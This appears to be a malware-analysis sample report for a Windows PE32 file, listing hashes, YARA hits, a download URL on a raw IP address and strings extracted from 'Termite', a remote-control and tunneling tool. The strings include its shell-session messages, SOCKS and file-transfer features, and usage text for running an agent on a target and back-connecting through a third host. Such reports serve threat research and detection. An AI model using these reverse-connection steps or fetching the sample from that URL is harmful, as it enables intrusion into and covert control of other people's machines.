Sample details: 2820653437d5935d94fcb0c997d6f13c

Hashes
MD5: 2820653437d5935d94fcb0c997d6f13c
SHA1: 5c0b49e4c2671805e78948aa30beb21aa45346d2
SHA256: b2b2e900aa2e96ff44610032063012aa0435a47a5b416c384bd6e4e58a048ac9
SSDEEP: 768:kO9FDI/xwFkZjHFCNEOla8trgJo6HTcAs2UNddE5hIJDpzMhh6R:/DOP7FCKOlFGJoKoAs2f5hWpghh
Details
File Type: PE32
Yara Hits
YRP/IsPE32 | YRP/IsConsole | YRP/IsBeyondImageSize | YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/Misc_Suspicious_Strings
Source
http://173.199.71.172/agent_Win32.exe
Strings
		!This program cannot be run in DOS mode.
P`.data
.rdata
0@.eh_fram
0@.bss
.idata
127.0.0.1
libgcc_s_dw2-1.dll
__register_frame_info
libgcj-13.dll
_Jv_RegisterClasses
__deregister_frame_info
[ ERROR    ]  
WSAStartup failed!
cmd.exe
bind wrong.
Socket Server Starting now !
server start error pvalue is NULL
Got A Shell Session Here >>
start a new cmd shell here
GoodBye ! Shell Session Closed Now .
remember free this tree
node_id = %d ,child_num = %d,k = %d
res = 0? child_num = %d, k = %d
Zero tree
MacOSX
Windows
Arm-Linux
Unknow-OS
SOCKSv4 Not Support now!
the recv ip is %s
Something error on read URL
the read url is %s 
Not support IPv6?
NOT IPv4 IPv6 and URL ?
 Tcp ---> %s:%d 
Not support  UDP?
[ WARNNING ]  
--> %3d <-- (close)used/unused  %d/%d
Please wait a moment... I will try my best to release more resources.
--> %3d <-- (open)used/unused  %d/%d
[ OK       ]  
New Agent(%d) Online. Its father(%d)..
[ ERROR    ]  
CloseJob Error 1111
Unsupport now %d
UNKNOWN proto->cmdType %d
[ ERROR    ]  
add error ????
NodeType is error
Send info Error
[ OK       ]  
[recv ]id = %d,ostype = %d , nodetype = %d, pcname = %s
info == NULL or myself == NULL
UNKNOWN client node type %d
[ ERROR    ]  
list is null or List-> joblist is NULL
describe :%s , %d
[ ERROR    ]  
conn is NULL
proto is NULL
PROTOBUFLEN_OVERFLOW !!!!!
PROTO_RecvProto recv len error
[ ERROR    ]  
NEW TUNNEL to %d Build Error
nextconn == M_GETTARGETCONN_ERROR targetid = %d
M_BUILDDIRECTTUNNEL_ERROR targetid = %d
M_BUILDREVERSETUNNEL_ERROR targetid = %d
UNKNOWN nextconn -> ConnType
[ ERROR    ]  
GLOBAL_SetJobList NULL joblist
GLOBAL_GetJobList NULL joblist
No Name Now
[ OK       ]  
MY ID IS %d, Upper ID is %d
{id:%d,OSType:%d,pcname:%s,linktype:%d}
***************1 Neighbor node list ************
*************** Tree node map      ************
my id is %d now.
[ ERROR    ]  
nrecv (%d) != maxlen (%d)
m_fun_server_cbf no CBF fun????
[ ERROR    ]  
pvalue is NULL
conn is NULL
BuildTargetSock Error
[ ERROR    ]  
RECV MSG ERROR
[ OK       ]  
New_Message_Here -->%s
[ ERROR    ]  
Open %s File Error
[ OK       ]  
UPFile CMD exec Ok !
Open %s File error
[ ERROR    ]  
Recv CMDMsg Error
CCProxy_onNewTunnel Error CMD(%d)
l:c:p:hvadq
listen
tohost
toport
version
detailed
This Client Node
c is %d
[ OK       ]  
Listening --> 0.0.0.0:%d
Connect to --> %s:%d
Beta 1.0
VERSION : %s
	$ ./xxx -h
	$ ./xxx -l [lport]
	$ ./xxx -c [rhost] -p [rport]
---------
options :
Listen a local port.
%4s %-8s %s
Remote host address.
The port on remote host.
This help page.
Show the version.
Show the about text.
Show the detailed text.
          ."'".
      .-./ _=_ \.-.
     {  (,(oYo),) }}
     {{ |   "   |} }
     { { \(---)/  }}
     {{  }'-=-'{ } }
     { { }._:_.{  }}
     {{  } -:- { } }
     {_{ }'==='{  _}
    ((((\)     (/))))
Termite
 %s is a Machine Control Tool.It has many advantages.
 There is a level-1 tool before ,you can find it from 
 http://www.rootkiter.com/EarthWorm/ .
 On the basis of 'EarthWorm',I added a built-in shell,
 then add so much commands there. You can find more 
 discription by add '-h' and '-d' parameter.
 Contributors
 rootkiter : The creator
 wooyaa    : Proviede some advice
 syc4mor3  : Named for this tool
 1. You can control multiple hosts at the same time
   In "admin_exe" there is a built-in shell.
   So that,you can do different operation at the same time.
 2. It support Multiple control command.
    1. Lcx_Tran       2. SOCKSv5 Server
    3. Shell-Server   4. Upload file 
    5. Download file  
 3. You can manage Common e-machine.
   It support various OS or CPU.For example:
        Linux  (x86/x64/Arm/Mipsel);
        Windows(x86/x64);
        MacOS  (x64);
       More is coming...
 4. You can use it on the Intranet or Extranet.
   Eg:
   4-1: When target has public IP,manage it with direct mode.
      a-step) Run agent on target host:
        $ ./agent_exe -l 8888
      b-step) Manage it with connect it
        $ ./admin_exe -c [target-ip] -p 8888 .
   4-2. When target in a remote Extranet.You can Manage it
        through a third-HOST(With public IP).
      a-step) Run agent on third-HOST:
      b-step) back-connect third-HOST from target with agent
        $ ./agent_exe -c [third-HOST ip] -p 8888
      c-step) Manage target through third-HOST
        $ ./admin_exe -c [third-HOST ip] -p 8888
 5. You can manage remote hosts through a multi-level cascade.
   In the build-in shell,there is a "connect" or "listen" 
   command,you can use it recv another agent,then manage the  
   new agent together.
Beta 1.0
VERSION : %s
Mingw runtime failure:
  VirtualQuery failed for %d bytes at address %p
  Unknown pseudo relocation protocol version %d.
  Unknown pseudo relocation bit size %d.
%s: option requires an argument -- %c
%s: unrecognised option `-%s'
%s: invalid option -- %c
option `%s%s' doesn't accept an argument
option `%s%s' requires an argument
%s: option `%s' is ambiguous
%s: unrecognised option `%s'
POSIXLY_CORRECT
GCC: (GNU) 4.8.1
CreateProcessA
CreateThread
DeleteCriticalSection
EnterCriticalSection
ExitProcess
GetLastError
GetModuleHandleA
GetProcAddress
InitializeCriticalSection
LeaveCriticalSection
SetUnhandledExceptionFilter
TlsGetValue
VirtualProtect
VirtualQuery
__getmainargs
__p__environ
__p__fmode
__set_app_type
_cexit
_onexit
_setmode
atexit
calloc
fclose
fprintf
fwrite
getenv
malloc
memcpy
memset
printf
putchar
signal
sprintf
strcpy
strlen
strncpy
vfprintf
WSASocketA
WSAGetLastError
WSAStartup
__WSAFDIsSet
accept
connect
gethostbyname
inet_ntoa
listen
select
shutdown
KERNEL32.dll
msvcrt.dll
WS2_32.dll
WSOCK32.DLL